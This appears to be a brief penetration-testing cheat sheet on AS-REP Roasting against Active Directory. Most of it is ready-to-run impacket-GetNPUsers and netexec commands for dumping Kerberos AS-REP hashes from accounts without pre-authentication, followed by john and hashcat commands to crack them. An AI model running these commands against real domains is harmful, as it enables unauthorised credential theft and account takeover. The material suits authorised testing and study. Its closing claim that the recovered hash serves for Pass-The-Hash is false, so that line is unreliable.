AS-REP Roasting

Last modified: 2024-02-18

Active Directory Windows

AS-REP Roasting is a technique that retrieves password hashes that are not required Kerberos preauth in Active Directory.


Lists users and passwords is not required Kerberos pre auth. Used for ASREPRoasting.

impacket-GetNPUsers example.local/<username>
impacket-GetNPUsers -dc-ip <target-ip> example.local/ -no-pass -usersfile users.txt
impacket-GetNPUsers -dc-ip <target-ip> example.local/<username> -no-pass -format hashcat 

# Without authenticatino
netexec ldap <target-ip> -u users.txt -p '' --asreproast output.txt
# With authentication
netexec ldap <target-ip> -u username -p password --asreproast output.txt

If we find a password hash, crack it.

john --format=krb5asrep --wordlist=wordlist.txt hash.txt
# or
hashcat -m 18200 -a 0  hash.txt wordlist.txt

Also, we can use it to Pass-The-Hash attack.